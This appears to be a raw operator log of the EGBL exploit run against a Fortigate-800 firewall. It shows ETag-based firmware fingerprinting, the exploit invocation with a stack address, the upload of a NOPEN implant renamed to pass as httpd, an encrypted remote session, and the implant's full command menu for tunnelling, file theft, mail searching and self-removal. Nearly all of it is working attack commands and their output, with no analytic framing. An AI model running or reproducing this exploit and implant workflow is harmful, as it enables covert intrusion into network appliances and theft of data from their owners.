# Egregious Blunder (EGBL) exploit


# pwd

# curl --insecure --head | grep ETag
ETag: "63e_4f_4683142d"

# grep 4683142d ./EGBL.config
ETAG = 4683142d : 0xbffff4a8 : 800 : 3 : 0559 # BLATSTING

# LD_LIBRARY_PATH=/current/bin/lib ./egregiousblunder_3.0.0.1 -t -p 443 -l 1234 --ssl 1 -v --config ./EGBL.config --etag 4683142d --nopen
EGBL vers
current options:
  target IP:
  target port: 443 (SSL on)
  config file: ./EGBL.config (vers
  etag: 4683142d (index 326)
  hardware = 800, firmware = 0559 (gen 3): etag = 4683142d
  using firmware generation 3
  source port: 1234
  install NOPEN
    noserver file to upload: /current/up/morerats/staticrats/noserver-
    noclient local executable: /current/bin/noclient
    loading noserver on target as /bin/httpd, process to run as name /bin/httpsd
  verbose: 1
  debug: 0

loading nopen over HTTPS
prepping to send file /current/up/morerats/staticrats/noserver- of size 356996
using stack addr 0xbffff4a8
received good ACK1 message c0edbabe
received stack addr 0xbffff4a8
sent the file len/header, next is the file
done with sending (356996 bytes), waiting for file ack
received good ACK2 message 356996, upload is cool
got file ack, file size 356996 uploaded
invoking /current/bin/noclient -i 4 to take over

NOPEN!                             v3.0.5.3

Wed Aug 17 12:29:28 GMT 2016
NHOME: environment variable not set, assuming "NHOME=/current/bin/.."
Initiating RSA key exchange
  Generating random number... ok
  Initializing RC6... ok
  Sending random number... ok
  Receiving random number... ok
  Generating session key... 0xDD5A18A835851B4B1549DB3B984EBDE7
  Sending first verify string... ok
  Receiving second verify string... ok
  Checking second verify string... ok
RSA key exchange complete
NOPEN server version...

  Bytes In / Out     197/82 (240%C) / 63/4 (1575%C)
  Local Host:Port    localhost:1234 (
  Remote Host:Port   (null):0 (:0)
  Remote Host:Port   Fortigate-800:443 (
  NOPEN client
  Date/Time          Wed Aug 17 12:29:29 UTC 2016
  Command Out
  CWD                /current/bin
  NHOME              /current/bin/..
  PID (PPID)         1749 (1748)
  NOPEN server
  WDIR               NOT SET
  OS                 Linux 2.4.25 #2 Wed Jun 27 21:28:31 EDT 2007 i686
  CWD                /
  PID (PPID)         5139 (34)

Creating history file "/current/bin/../down/history/Fortigate-800."... ok
Creating command output file "/current/bin/../down/cmdout/Fortigate-800."... ok

Lonely?  Bored?  Need advice?  Maybe "-help" will show you the way.

We are starting up our virtual autoport
We are bound and ready to go on port 1025
NO! Fortigate-800:/>-help
[08-17-16 12:29:49 GMT][localhost:1234 -> Fortigate-800.]

Remote General Commands:
Usage: -elevate
Usage: -getenv
Usage: -gs category|filename [options-if-any]
Usage: -setenv VAR=[val]
Usage: -shell
Usage: -status
Usage: -time

Remote Server Commands:
Usage: -burn
Usage: -call ip port
Usage: -listen port
Usage: -pid

Remote Network Commands:
Usage: -icmptime target_ip [source_ip]
Usage: -ifconfig
Usage: -nslookup name1 ...
Usage: -ping -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -ping host
       -ping [-u|-t|-i] host
Usage: -trace -r remote_target_ip [-l local_source_ip] [-i|-u|-t] [-p dest_port] [-s src_port]
       -trace host
       -trace [-u|-t|-i] host

Remote Redirection Commands:
Usage: -fixudp port
Usage: -irtun target_ip call_back_port [call_back_ip] [ourtn arguements]
Usage: -jackpop target_ip target_port source_ip source_port
Usage: -nrtun port [toip [toport]]
Usage: -nstun toip [toport [localport [srcport [command]]]]
       -nstun toip:port
Usage: -rawsend tcp_port
Usage: -rtun port [toip [toport]]
Usage: -scan
Usage: -sentry target_address source_address (tcp|udp) dest_port src_port interface
Usage: -stun toip toport [localport [srcport]]
Usage: -sutun [-t ttl] toip toport [localport [srcport]]
Usage: -tunnel [command_listen_port [udp]]
Usage: -vscan  (should add help)

Remote File Commands:
Usage: -cat remfile
Usage: -chili [-l] [-s lines] [-m max] MM-DD-YYYY remdir remfile [remfile ...]
Usage: -cksum remfile ...
Usage: -fget [MM-DD-YYYY] loclist
Usage: -get [-l] [-q] [-s minimumsize] [-m MM-DD-YYYY] remfile ...
Usage: -grep [-d] [-v] [-n] [-i] [-h] [-C number_of_context_lines] pattern file1 [file2 ...]
Usage: -oget [-a] [-q] [-s begoff] [-b begoff] [-e endoff] remfile
Usage: -put locfile remfile [mode]
Usage: -strings remfile
Usage: -tail [+/-n] remfile, + to skip n lines of remfile beginning
Usage: -touch [-t mtime:atime | refremfile] remfile
Usage: -rm remfile|remdir ...
Usage: -upload file port
Usage: -mailgrep [-l] [-m maxbytes] [-r "regexp" [-v]] [-f regexpfilename [-v]] [-a "regexp for attachments to eliminate"] [-b MM-DD-YYYY] [-e MM-DD-YYYY] [-d remotedumpfile] remotedir file1 [file2 ...]
 ex: -mailgrep -a ".doc" -r "^Fred" -b 2-28-2002 /var/spool/mail G*

Remote Directory Commands:
Usage: -find [-M | -m -mkfindsargs] [-x[m|a|c] MM-DD-YYYY] remdir [remdir...]
Usage: -ls [-1ihuRt] [-x[m|a|c] MM-DD-YYYY] [remfile|remdir ...]
Usage: -cd [remdir]
Usage: -cdp

Local Client Commands:
Usage: -autopilot port [xml]
Usage: -cmdout [locfilename]
Usage: -exit
Usage: -help
Usage: -hist
Usage: -readrc [locfile]
Usage: -remark [comment]
Usage: -rem [comment]
Usage: # [comment]
Usage: -reset

Local Environment Commands:
Usage: -lcd locdir
Usage: -lgetenv
Usage: -lpwd
Usage: -lsetenv VAR=[val]
Usage: -lsh [[-q] command]


NO! Fortigate-800:/>

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